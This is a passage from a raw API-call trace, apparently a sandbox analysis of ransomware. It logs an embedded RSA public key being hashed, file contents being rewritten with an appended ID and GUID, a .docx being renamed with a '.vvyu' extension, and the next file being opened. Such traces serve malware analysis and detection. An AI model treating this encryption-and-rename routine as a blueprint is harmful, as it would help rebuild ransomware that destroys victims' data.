KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.339] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.339] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.339] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.340] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.341] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.341] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.341] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.341] GetLastError () returned 0x0 [0196.341] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.341] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.341] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.341] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.341] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe400) returned 0x2ea79b0 [0196.342] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1728 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2df8 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1770 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e10 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e58 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.343] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.343] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0196.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e58 [0196.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2e40 [0196.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0196.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0196.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.347] GetCurrentThreadId () returned 0x66c [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea51d0 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.348] GetCurrentThreadId () returned 0x66c [0196.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.348] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e40 [0196.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e58 [0196.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0196.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e28 [0196.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2eb8 [0196.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e88 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2e70 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ed0 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e70 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e88 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2e40 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0196.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e40 | out: hHeap=0x620000) returned 1 [0196.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e70 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e58 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e28 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2e10 | out: hHeap=0x620000) returned 1 [0196.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1770 | out: hHeap=0x620000) returned 1 [0196.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.359] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xe3f0, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xe3f0, lpOverlapped=0x0) returned 1 [0196.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.361] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xe3f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.361] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.361] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.362] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.362] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.362] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.363] CloseHandle (hObject=0x568) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.365] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\naiagGM8S5tSkx.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\naiaggm8s5tskx.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\naiagGM8S5tSkx.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\naiaggm8s5tskx.docx.vvyu")) returned 1 [0196.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.366] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.369] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28a4d680, ftCreationTime.dwHighDateTime=0x1d8a539, ftLastAccessTime.dwLowDateTime=0x1da3cfd0, ftLastAccessTime.dwHighDateTime=0x1d8a740, ftLastWriteTime.dwLowDateTime=0x1da3cfd0, ftLastWriteTime.dwHighDateTime=0x1d8a740, nFileSizeHigh=0x0, nFileSizeLow=0x597e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ni1u7VXc2C N4UUHwH.pps", cAlternateFileName="NI1U7V~1.PPS")) returned 1 [0196.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.370] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Ni1u7VXc2C N4UUHwH.pps") returned=".pps" [0196.370] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\Ni1u7VXc2C N4UUHwH.pps" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ni1u7vxc2c n4uuhwh.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 